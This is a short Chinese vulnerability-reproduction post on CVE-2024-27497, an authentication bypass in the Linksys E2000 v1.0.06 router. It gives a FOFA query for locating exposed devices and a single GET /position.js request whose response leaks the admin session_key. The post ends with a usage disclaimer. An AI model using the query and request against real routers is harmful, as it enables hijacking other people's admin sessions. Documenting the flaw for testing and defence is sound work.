【漏洞复现】Linksys E2000 position.js 身份验证绕过漏洞(CVE-2024-27497)

0x01 产品简介

Linksys E2000是一款由思科(Cisco)品牌推出的无线路由器,它是一款支持2.4GHz和5GHz双频段的无线路由器,用户可以避开拥挤的2.4GHz频段,独自享受5GHz频段的高速无线生活。

0x02 漏洞概述

Linksys E2000 v1.0.06 存在身份验证绕过漏洞,未授权的攻击者可以通过该漏洞获取管理员的当前会话,从而绕过身份验证。

0x03 测绘语句

复制代码
FOFA:app="LINKSYS-E2000"

0x04 漏洞复现

复制代码
GET /position.js HTTP/1.1
复制代码
如访问 /position.js路由存在 session_key和close_session字段,则证明存在此漏洞。

0x05 影响范围

复制代码
Linksys E2000 v1.0.06

0x06 免责声明

复制代码
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
相关推荐
2603_954708311 分钟前
全维度容错设计,打造微电网安全运行屏障
服务器·网络·数据库·人工智能·分布式·安全
青岛前景互联信息技术有限公司40 分钟前
以新标准为底座,前景互联打造高危场景智能接处警新体系
大数据·网络·人工智能
大飞记Python1 小时前
Linux命令速查手册(测试开发4年实战总结,附PDF)
linux·网络·pdf
冰茶丿1 小时前
嵌入式安全第一关:Secure Boot是怎么保护你的设备的?
嵌入式硬件·安全
Sirius Wu1 小时前
OpenClaw(UpClaw)三层Tool全链路治理深度详解
网络·人工智能·架构·aigc
源图客1 小时前
云途物流API开发-鉴权认证(Java)
java·网络·python
huashengzsj2 小时前
Shopify个人建站如何搭建独立站:从零开始的完整指南
前端·网络·人工智能
长风2303 小时前
Day14: 极限异常演练 —— 验证系统韧性与错误告警生成
人工智能·安全
云飞云共享云桌面3 小时前
单机建模卡顿运维繁琐!中小型机械制造厂云飞云 3D 云桌面落地
运维·服务器·网络·3d·自动化·电脑·负载均衡
mounter6253 小时前
BPF 的进化史:从网络过滤器到 AI 时代的 Linux 核心引擎
linux·网络·人工智能·ebpf·linux kernel·kernel